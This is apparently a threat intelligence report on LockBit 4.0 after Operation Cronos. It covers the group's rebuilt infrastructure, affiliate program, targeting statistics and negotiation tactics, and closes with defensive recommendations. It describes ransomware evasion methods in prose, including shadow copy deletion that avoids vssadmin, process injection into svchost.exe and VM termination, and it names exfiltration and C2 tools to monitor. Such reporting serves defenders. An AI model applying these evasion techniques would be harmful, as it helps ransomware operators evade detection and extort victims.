LockBit 4.0: Resurgence After Operation Cronos
Following the February 2024 law enforcement takedown, LockBit has re-emerged as LockBit 4.0 with hardened infrastructure, a new encryptor, and a reformed affiliate program targeting mid-market enterprises.
Overview
LockBit’s trajectory since Operation Cronos — the February 2024 coordinated takedown by Europol, the FBI, NCA, and a dozen allied agencies — has been one of the most closely watched stories in ransomware intelligence. Dmitry Khoroshev, unmasked as the alleged LockBit administrator “LockBitSupp,” attempted to maintain operations throughout 2024, but infrastructure seizures, affiliate defections, and public exposure of the backend panel crippled the group’s capability for most of that year.
By mid-2025, however, signals of reconstitution began appearing. Threat intelligence teams at multiple vendors observed new dark-web postings, fresh recruitment threads on underground forums, and encryptor samples with architectural differences from LockBit 3.0 (also called LockBit Black). By late 2025, the group was operating under the informal designation LockBit 4.0 — though the actors themselves avoid numbering.
New Infrastructure Architecture
Operation Cronos succeeded in part because LockBit had centralized too much. The takedown team gained access to administrative panels, affiliate credential stores, and decryption keys. LockBit 4.0 has shifted toward a federated model with significant operational security improvements:
Bulletproof hosting rotation. The new infrastructure cycles through a larger pool of hosting providers, primarily in jurisdictions with poor extradition cooperation. RDP and VNC management channels are now proxied through at least two intermediary nodes before reaching operational infrastructure.
Affiliate isolation. Affiliates in the 4.0 program operate in a more compartmentalized fashion. The central group provides the encryptor and negotiation portal, but affiliates maintain independent victim communication channels for initial contact. This limits what law enforcement can reconstruct from any single affiliate compromise.
Tor v3 hidden services. The leak site and affiliate portal now run exclusively on v3 onion addresses, which are cryptographically stronger and harder to deanonymize than the v2 addresses used in earlier iterations.
Updated Encryptor: Technical Changes
The LockBit 4.0 encryptor shows meaningful departures from the LockBit 3.0 codebase that was leaked in September 2022:
- Encryption scheme: Shifted from a pure AES-256 + RSA-2048 hybrid to ChaCha20-Poly1305 for file encryption, retaining RSA-4096 for key encapsulation. ChaCha20 is significantly faster on systems without AES hardware acceleration, which is relevant for older industrial and healthcare hardware.
- ESXi targeting: The Linux/ESXi variant now enumerates and terminates running virtual machines before encryption, closing the gap that allowed some victims to recover VMs from snapshots.
- Shadow copy deletion: Uses a combination of WMI and direct VSS COM API calls rather than vssadmin, evading some endpoint detection rules that specifically monitor vssadmin execution.
- Defense evasion: Implements early process injection to establish persistence under svchost.exe before beginning encryption, buying time before EDR products can build a behavioral baseline.
- Partial encryption threshold: Files above 4 GB now encrypt only every other 1 MB block rather than the full file, substantially increasing throughput on file servers with large media or database files.
Affiliate Recruitment and RaaS Model
The LockBit 4.0 affiliate program has been rebuilt with stricter vetting. Underground forum recruitment threads — observed on RAMP and several Russian-language cybercrime boards — require proof of prior access broker activity or demonstrated network intrusion capability. Initial deposits in Monero (rather than Bitcoin) are required to join, making financial tracking harder.
The revenue split remains competitive at 80/20 in favor of affiliates, with a 75/25 split for affiliates generating over $5M in quarterly payments. Uniquely, LockBit 4.0 now offers a “negotiation SLA” — promising affiliates that the central team will respond to victim negotiations within four hours, a direct response to complaints that slow negotiation turnaround cost affiliates deals under the previous program.
Targeting Profile
LockBit 4.0 has largely abandoned the “big game hunting” approach that characterized some 2022–2023 operations against critical infrastructure. Law enforcement attention on high-profile victims has pushed the group toward mid-market targets: companies with $50M–$500M in annual revenue, sufficient cyber insurance, and less mature security operations.
Most targeted sectors in 2025–2026:
- Manufacturing and industrial (26% of confirmed victims)
- Legal and professional services (19%)
- Financial services, excluding tier-1 institutions (17%)
- Healthcare — specifically regional hospitals and specialty clinics (14%)
The geographic spread has also shifted. North American targets remain dominant (~52%) but EU targets have declined as LockBit attempts to reduce geopolitical heat from European law enforcement agencies that were central to Operation Cronos.
Negotiation and Payment Tactics
Ransom demands in confirmed 2026 incidents range from $800K to $12M for initial ask, with payments settling between 35% and 60% of initial demand after negotiation. The group employs a tiered exfiltration threat: a 72-hour countdown before the first data publication, followed by staged releases designed to maximize pressure without exhausting all leverage before payment.
One notable change is the introduction of “data insurance” framing — LockBit 4.0 now explicitly markets the ransom payment as purchasing deletion of exfiltrated data rather than merely receiving a decryptor. While no ransomware actor’s data-deletion promises are reliably honored, this framing has proven effective in sectors where regulatory exposure from data publication is high.
Defensive Recommendations
Organizations should prioritize detection of the post-exploitation tooling LockBit affiliates consistently deploy pre-encryption: Cobalt Strike with malleable C2 profiles, Brute Ratel C4, and increasingly Havoc Framework. Monitoring for RClone, WinSCP, and MegaSync execution in unexpected contexts catches exfiltration before ransomware detonation. ESXi environments should enforce MFA on management interfaces and disable direct root SSH access.